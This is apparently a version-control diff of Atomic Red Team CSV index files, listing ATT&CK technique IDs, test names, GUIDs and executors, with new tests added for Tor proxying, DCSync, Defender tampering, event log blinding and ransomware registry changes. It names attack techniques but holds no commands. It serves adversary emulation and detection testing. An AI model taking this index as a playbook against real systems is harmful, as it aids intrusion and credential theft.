 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -1000,6 +1030,10 @@ command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsof
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
+command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
+command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
+command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
+command-and-control,T1090.003,Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
 command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -202,6 +202,10 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
+persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -242,6 +246,7 @@ command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
+command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -260,6 +265,8 @@ execution,T1053.006,Systemd Timers,2,Create a user level transient systemd servi
 execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
+execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
+execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -107,6 +107,7 @@ impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Lin
 impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
 discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
 discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
+discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
@@ -171,6 +172,7 @@ command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
+command-and-control,T1090.003,Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -13,9 +13,11 @@ credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credential
 credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
 credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
 credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
+credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
+credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
@@ -48,8 +50,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
+credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
@@ -77,6 +80,7 @@ collection,T1560.001,Archive via Utility,2,Compress Data and lock with password
 collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
 collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
 collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
@@ -93,6 +97,7 @@ collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Stagi
 collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
+collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -123,6 +128,7 @@ privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -159,6 +165,7 @@ privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-3
 privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -230,6 +237,7 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
+defense-evasion,T1562.002,Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
@@ -252,6 +260,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -288,12 +297,16 @@ defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier al
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
 defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -356,6 +369,7 @@ defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe r
 defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
+defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -364,6 +378,9 @@ defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-39
 defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
+defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
+defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
+defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
@@ -374,6 +391,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
 defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -417,6 +435,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
 persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -453,6 +472,7 @@ persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-
 persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -552,6 +572,7 @@ discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa
 discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
+discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -599,6 +620,8 @@ command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
+command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
+command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
 command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
@@ -655,6 +678,7 @@ execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0
 execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
 execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
+execution,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
@@ -664,6 +688,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
